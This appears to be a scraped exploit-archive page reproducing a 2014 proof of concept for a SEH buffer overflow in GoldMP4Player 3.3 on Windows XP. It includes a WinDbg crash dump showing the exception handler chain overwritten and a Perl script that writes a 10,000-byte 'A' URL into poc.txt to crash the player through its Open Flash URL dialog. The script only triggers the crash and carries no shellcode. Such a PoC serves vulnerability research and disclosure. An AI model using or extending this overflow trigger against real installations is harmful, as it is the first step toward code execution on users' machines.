扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 |
#---------------------------------------------------------------------------------# # Exploit Title: GoldMP4Player 3.3 - Buffer Overflow PoC (SEH)# # Date: Feb 25 2014 # # Exploit Author: Gabor Seljan# # Software Link: http://download.cnet.com/GoldMP4Player/3000-2139_4-10967424.html # # Version: 3.3# # Tested on: Windows XP SP3 # #---------------------------------------------------------------------------------# # (cb4.cb0): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=05506f41 ebx=00000111 ecx=05503ff1 edx=00130000 esi=05506fe0 edi=00000003 # eip=0041a0c3 esp=0012e25c ebp=054f4f88 iopl=0 nv up ei pl nz na po nc # cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010202 # *** WARNING: Unable to verify checksum for image00400000 # *** ERROR: Module load completed but symbols could not be loaded for image00400000 # image00400000+0x1a0c3: # 0041a0c3 8802mov byte ptr [edx],alds:0023:00130000=41 # 0:000> !exchain # 0012e270: image00400000+4c1b3 (0044c1b3) # 0012e3b0: image00400000+4c56a (0044c56a) # 0012e430: image00400000+4c4ec (0044c4ec) # 0012e4e0: *** ERROR: Symbol file could not be found. # 0012e534: USER32!DeregisterShellHookWindow+1cf (7e44048f) # 0012e748: USER32!DeregisterShellHookWindow+1cf (7e44048f) # 0012e7a8: USER32!DeregisterShellHookWindow+1cf (7e44048f) # 0012e8cc: image00400000+4c333 (0044c333) # 0012e9f4: <Unloaded_ION.dll>+41414140 (41414141) # Invalid exception stack at 41414141 #!/usr/bin/perl use strict; use warnings; my $filename = "poc.txt"; my $junk = "A" x 10000; open(FILE, ">$filename") || die "[-]Error:\n$!\n"; print FILE "http://$junk.swf"; close(FILE); print "Exploit file created successfully [$filename]!\n"; print "Now open the URL in $filename via File -> Open Flash URL\n"; |
体验盒子
